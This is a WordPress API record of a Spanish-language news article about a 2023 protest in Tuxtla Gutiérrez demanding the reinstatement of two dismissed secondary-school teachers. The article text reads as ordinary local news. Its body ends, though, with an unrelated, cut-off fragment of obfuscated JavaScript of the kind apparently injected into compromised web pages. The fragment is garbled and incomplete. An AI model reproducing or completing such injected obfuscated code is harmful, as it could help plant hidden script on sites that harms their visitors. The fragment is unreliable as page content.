{"id":10470,"date":"2023-06-10T02:59:37","date_gmt":"2023-06-10T02:59:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10470"},"modified":"2023-06-10T02:59:38","modified_gmt":"2023-06-10T02:59:38","slug":"piden-la-reinstalacion-de-docentes-de-la-secundaria-flores-magon","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10470","title":{"rendered":"Piden la reinstalaci\u00f3n de docentes de la Secundaria Flores Mag\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686365915107-1024x768.jpg\" alt=\"\" class=\"wp-image-10471\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686365915107-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686365915107-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686365915107-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686365915107.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>9 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Maestros, alumnos y docentes de la Escuela Secundaria Ricardo Flores Mag\u00f3n, localizada en la Colonia San Jos\u00e9 Ter\u00e1n, realizaron una en\u00e9rgica protesta para pedir la restituci\u00f3n de dos maestros que fueron cesados sin motivo alguno.<\/p>\n\n\n\n<p>En la marcha que parti\u00f3 de la exfuente Mactumatz\u00e1, dieron a conocer que, la directora Noem\u00ed Robles S\u00e1nchez, es la responsable de esta situaci\u00f3n, pues lo docentes Ulises Velasco Ruiz y Juan Eduardo Rodr\u00edguez L\u00f3pez, han sido cr\u00edticos del desempe\u00f1o de la direcci\u00f3n.<\/p>\n\n\n\n<p>\u201cLa responsabilidad de que, el d\u00eda de hoy los alumnos no se encuentren en las aulas y salgan a protestar es de la directora, de las autoridades educativas que no han hecho nada, se trata de una arbitrariedad, y se ha manejado desde hace mucho tiempo en contra del magisterio\u201d, expresaron los manifestantes.<\/p>\n\n\n\n<p>A esta protesta se sumaron otras escuelas que, tambi\u00e9n exigen se haga justicia para los docentes que, han mostrado un excelente desempe\u00f1o a lo largo de m\u00e1s de 20 a\u00f1os.<\/p>\n\n\n\n<p>Los docentes que participaron a esta protesta dieron a conocer que, tambi\u00e9n alzaron la voz por los cesados de todos los niveles educativos.<\/p>\n\n\n\n<p>\u201cSe suman ahora dos cesados, por ello hacemos este acompa\u00f1amiento, los maestros exigimos la restituci\u00f3n de los dos compa\u00f1eros, los cuales fueron cesados sin ser notificados, por ello se ha solicitado una revisi\u00f3n del caso y que expliquen por qu\u00e9 la Subsecretar\u00eda de Educaci\u00f3n Federalizada, no notifican y pasan directamente este proceso al Tribunal Burocr\u00e1tico\u201d, indicaron.<\/p>\n\n\n\n<p>El docente Ulises dio a conocer que por ser delegados sindicales hoy est\u00e1n pagando las consecuencias, \u201cme acusan de una amenaza en una reuni\u00f3n, pero hasta el momento no comprueban esta acusaci\u00f3n, no he firmado documento alguno, no me han notificado, esa es la irregularidad\u201d.<\/p>\n\n\n\n<p>En este escenario dio a conocer que, todo esto tiene su origen por haber se\u00f1alado diferentes irregularidades de la directora, ante el supervisor de la zona.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 9 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Maestros, alumnos y docentes de la Escuela Secundaria Ricardo Flores Mag\u00f3n, localizada en la Colonia San Jos\u00e9 Ter\u00e1n, realizaron una en\u00e9rgica protesta para pedir la restituci\u00f3n de dos maestros que fueron cesados sin motivo alguno. En la marcha que parti\u00f3 de la exfuente Mactumatz\u00e1, dieron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10471,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10470","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10470","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10470"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10470\/revisions"}],"predecessor-version":[{"id":10472,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10470\/revisions\/10472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10471"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}